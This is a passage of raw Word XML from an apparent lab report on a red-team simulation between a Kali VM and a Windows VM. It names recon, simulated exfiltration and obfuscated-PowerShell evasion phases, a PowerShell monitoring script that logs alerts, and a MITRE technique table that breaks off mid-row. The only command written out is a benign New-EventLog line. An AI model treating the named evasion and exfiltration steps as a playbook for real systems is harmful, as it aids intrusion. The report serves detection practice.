          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">was created in windows that continuously logs for recon,exploit,evasion,exfil and saves all the logs in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>unified_alerts.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B51CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali  IP: 192.168.1.43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFC84A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows VM (IP) : 192.168.1.53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C9E24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>A new log entry was created on windows vm using command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>New-EventLog -LogName “RedTeamLogg” -Source “RedTeamSimm”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015783B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5729605" cy="1308735"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="8" name="Picture 8" descr="event log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vent log name"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5729605" cy="1308735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBBE4E2">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc9502"/>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4</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1</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log event being created</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="34FA0953">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>The engagement was structured to simulate a complete attack life-cycle using native tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1A277">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanning from Kali using basic network discovery (ping, SMB enumeration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA51D3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Initial Access:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Direct file transfers from Kali to Windows (simulated exfil).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7C1B08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Ex filtration Simulation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creation of test files on Windows and copying them to shared folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41E460">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Logging &amp; Monitoring:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows PowerShell script (unified_monitor.ps1) monitored all activities and logged alerts to unified_alerts.csv in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37B169">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="840" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Evasion Attempts:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use of obfuscated PowerShell commands to test logging triggers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5727700" cy="3077210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="22" name="Picture 22" descr="log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 script"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5727700" cy="3077210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BB99F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc32126"/>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4</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2 Shows unified_monitor.ps1 file on windows vm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="14A39083">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E95EE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A52EA1D">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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc21884"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Phase-wise Actions &amp; MITRE Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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869"/>
        <w:gridCol w:w="1733"/>
        <w:gridCol w:w="4130"/>
        <w:gridCol w:w="2407"/>
      </w:tblGrid>
      <w:tr w14:paraId="4D883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CF11CDC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28D23529">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Tool Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="054E7886">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Action Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2362" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CEE79C5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>MITRE Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="14ADC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1C4950B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C762A15">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SMB, Ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EEE6B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Network and share enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2362" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D23626F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>T1595</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6449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CF0DAEB">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3996D3B5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B9A834E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>File creation / copy on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2362" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="394145C7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>T1210</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="24CB6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1694E6E3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="790BFB57">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31C3EBE2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
